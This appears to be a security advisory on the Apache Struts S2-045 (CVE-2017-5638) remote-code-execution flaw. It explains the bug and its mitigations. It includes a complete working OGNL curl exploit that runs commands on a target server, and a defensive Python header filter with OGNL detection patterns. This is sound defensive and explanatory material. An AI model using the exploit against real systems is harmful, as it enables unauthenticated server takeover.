CVE-2017-5638 (Apache advisory S2-045) is a remote code execution flaw in the Jakarta Multipart parser that Apache Struts 2 uses for file uploads. Struts hands a request to that parser whenever the Content-Type header contains the string multipart/form-data; the parser then rejects any header that does not actually start with that media type and throws an exception whose message embeds the raw header value. Struts builds the user-facing error from that message through its localized-text lookup, which evaluates any Object-Graph Navigation Language (OGNL) expression of the form %{...} it finds in the text. OGNL is the expression language Struts uses for data binding, and it can reach arbitrary Java classes and methods. An attacker therefore sends a single unauthenticated request whose Content-Type header contains the literal multipart/form-data wrapped inside an OGNL expression. The flawed exception handler passes the tainted header to the OGNL interpreter without any sanitization, and the expression runs with the application's own privileges, so the attacker gets remote code execution: arbitrary system commands as the servlet-container user, data exfiltration, or complete control of the affected host.
Platform: Apache Struts 2
Affected versions: 2.3.5 - 2.3.31, 2.5 - 2.5.10
Vulnerability: Remote Code Execution (OGNL injection via the Content-Type header)
Severity: Critical
Date: 2017-03-07
Patch released: 2017-03-07
What Undercode Says:
```sh
# Proof-of-concept request for S2-045. The target URL is a placeholder.
# In OGNL, '#name' is a context variable and @class@member is a static reference.
curl -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://target.com/struts2-showcase/fileupload/doUpload.action
```

The expression first assigns the literal multipart/form-data to `#_` so that Struts routes the request to the multipart parser, then disables the OGNL member-access guard (directly, or by clearing the excluded-class and excluded-package lists on OgnlUtil when the guard is already set), picks cmd.exe or /bin/bash depending on os.name, runs the command through ProcessBuilder and copies its output into the HTTP response body, so the result of `whoami` comes back in the reply to the curl call.
How the exploit works:
The attacker crafts a single HTTP request whose Content-Type header contains an OGNL expression and sends it to any URL handled by the Struts filter; the request does not need to reach a file-upload action, because the multipart wrapping happens in the dispatcher before any action runs, and no authentication is required. The parser's exception handling evaluates the header as OGNL, so the attacker runs arbitrary system commands on the server and can read the output straight from the HTTP response.
Protection from this CVE:
Upgrade to Struts 2.3.32 or 2.5.10.1 immediately; this is the only complete fix. Until the upgrade is in place, Apache's advisory offers two workarounds: switch `struts.multipart.parser` to a different implementation, or deploy a servlet filter (or equivalent WAF rule) in front of the application that rejects any request whose Content-Type header contains multipart/form-data but is not a plain, well-formed multipart/form-data header with a boundary parameter. Treat header filtering as a stopgap only: the check has to be exact, and the same CVE was later shown (S2-046) to be reachable through other multipart request fields as well. Simply not exposing an upload form is not a mitigation, since every Struts-handled URL is affected.
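The following script is an added example, not code from the original post or from Apache Struts. It models the servlet-filter workaround described above in Python, so the logic can be tested offline before being ported into a filter or WAF rule, and it makes the mechanism from the opening paragraph concrete: a header is routed to the multipart parser by a substring test, then rejected by the parser because it does not start with the media type, and the PoC header passes the first check while failing the second. The regular expressions, the verdict names and the sample headers are this example's own assumptions; the sample requests are constructed.

```python
"""Content-Type screening for S2-045-style requests.

Added example, not code from the original post or from Apache Struts.
Models the servlet-filter workaround from the Struts advisory: reject any
request whose Content-Type mentions multipart/form-data but is not a plain,
well-formed multipart/form-data header. All sample headers are constructed.
"""
import re

MULTIPART_TOKEN = "multipart/form-data"

# A legitimate upload header: the media type followed by one boundary
# parameter. The boundary character set and 70-character limit follow
# RFC 2046. Accepting only this exact shape is an assumption of this
# example; a real filter may need to whitelist extra parameters (charset).
WELL_FORMED = re.compile(
    r"^multipart/form-data\s*;\s*boundary=\"?[0-9A-Za-z'()+_,./:=?-]{1,70}\"?\s*$",
    re.IGNORECASE,
)

# OGNL syntax that has no business in a Content-Type header: expression
# delimiters, '#' context-variable references and @class@member static access.
OGNL_MARKERS = re.compile(r"%\{|\$\{|#[A-Za-z_]|@[A-Za-z_][\w.]*@")


def routed_to_multipart_parser(content_type):
    """Mirror the substring test Struts applies before wrapping the request.

    It is a contains() check, not a startsWith() check, which is why the PoC
    can bury the literal 'multipart/form-data' inside an OGNL string literal.
    """
    return content_type is not None and MULTIPART_TOKEN in content_type


def classify(content_type):
    """Return 'allow', 'reject-ognl' or 'reject-malformed' for one header value."""
    if content_type is None:
        return "allow"
    if OGNL_MARKERS.search(content_type):
        return "reject-ognl"
    if routed_to_multipart_parser(content_type) and not WELL_FORMED.match(content_type):
        # Struts would wrap this request, and commons-fileupload would then
        # throw because the header does not start with the media type:
        # exactly the error path S2-045 lives in, so refuse it up front.
        return "reject-malformed"
    return "allow"


def screen_request(headers):
    """Apply classify() to a request's header dict (header names are case-insensitive)."""
    for name, value in headers.items():
        if name.lower() == "content-type":
            return classify(value)
    return "allow"


# Constructed sample requests. POC_HEADER is an abbreviated form of the
# Content-Type value used by the public PoC; it is enough to trip the checks.
POC_HEADER = ("%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
              "(#cmd='whoami').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd}))}")

SAMPLES = {
    "browser upload": {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW"},
    "json api call": {"content-type": "application/json"},
    "no content-type": {"Host": "target.com"},
    "s2-045 poc": {"Content-Type": POC_HEADER},
    # Not an upload at all, yet the substring test would still send it to the
    # multipart parser, which would then raise the error the bug sits in.
    "parser mismatch": {"Content-Type": "text/plain; note=multipart/form-data"},
}


def screen_samples():
    """Return the verdict for every constructed sample request."""
    return {label: screen_request(h) for label, h in SAMPLES.items()}


if __name__ == "__main__":
    for label, verdict in screen_samples().items():
        print(f"{label:16s} -> {verdict}")
```

The "parser mismatch" sample is the case a naive rule misses: it contains no OGNL, but because Struts routes on a substring match it would still reach the multipart parser's error path, so a filter that only looks for `%{` is not enough; the positive check against a well-formed header is what closes that gap.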
Impact:
Unauthenticated arbitrary command execution as the account running the servlet container, which in practice means full server compromise: exposure of any data the application can reach, credential theft, and a foothold for moving further into the network.
Sources:
Reported By: nvd.nist.gov

